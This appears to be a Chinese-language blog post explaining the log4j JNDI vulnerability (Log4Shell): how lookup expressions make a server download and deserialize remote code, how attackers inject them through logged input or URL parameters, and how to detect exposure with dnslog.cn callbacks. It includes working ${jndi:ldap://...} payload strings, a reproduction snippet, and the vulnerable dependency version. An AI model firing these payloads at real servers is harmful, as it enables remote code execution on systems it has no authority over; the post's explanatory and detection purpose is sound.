实现原理
log4j支持使用表达式的形式打印日志,比如
sh
logger.info("system propety: ${sys:user.dir}");问题就在与表达式支持非常多样,其中有一个jndi就是今天的主题
sh
logger.info("system propety: ${jndi:schema://url}");jdk将从url指定的路径下载一段字节流,并将其反序列化为Java对象,作为jndi返回。反序列化过程中,即会执行字节流中包含的程序。
因此,如果攻击者能够控制日志打印的内容,就可以使目标服务器从攻击者指定的任意url地址下载代码字节流,攻击者在字节流中附带的代码就会在目标服务器上执行。
那么问题来了,攻击者如何控制服务器上记录的日志内容呢?
非常简单! 大部分web服务程序都会对用户输入进行日志记录。例如:用户访问了哪些url,有哪些关键的输入等,都会被作为参数送到log4j中,我们在这些地方写上 ${jndi:ldap://http://xxx.dnslog.cn} 就可以使web服务从http://xxx.dnslog.cn下载字节流了。
12月9日晚,漏洞刚爆出时,在百度、google的搜索框内输入攻击字符串,就可以进行攻击。不提供输入框也好办,在url中随便附上一段也可能成功: www.target.com?${jndi:schema://url}
现在各大网站都已经完成了紧急修复工作,比如在taobao上尝试探测,会被ali的waf阻拦。
漏洞检测
漏洞检测可以使用 http://www.dnslog.cn/ 协助进行。 dnslog.cn 是安全检测常用工具之一,在其主页上点击 Get SubDomain 即可以自动生成一个 dnslog.cn 的子域名,这个子域名解析出来的ip是 127.0.0.1,也就是本机地址。
漏洞检测时,可以使用 ${jndi:ldap://http://xxx.dnslog.cn} ,如果攻击成功,目标服务器将会从 xxx.dnslog.cn 下载jndi字节流,下载之前首先得连接dnslog.cn进行xxx.dnslog.cn的域名解析,获得真实ip地址。dnslog.cn 会将所有dns解析记录显示在网站上,点击refresh即可看到。
攻击检测后,如果发现 dnslog.cn 中刷新到了dns解析记录,就表示探测成功。
java
private static final Logger LOG = LogManager.getLogger(Application.class);
LOG.info("${jndi:ldap://i3sicw.dnslog.cn}");如果使用的log4j版本小于2.15就会复现
xml
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.1</version>
</dependency>一个检测demo
https://gitee.com/ziy001/log4j-attack
运行后会在本机弹出计算器,说明客户端通过这个漏洞让服务端执行了某些代码。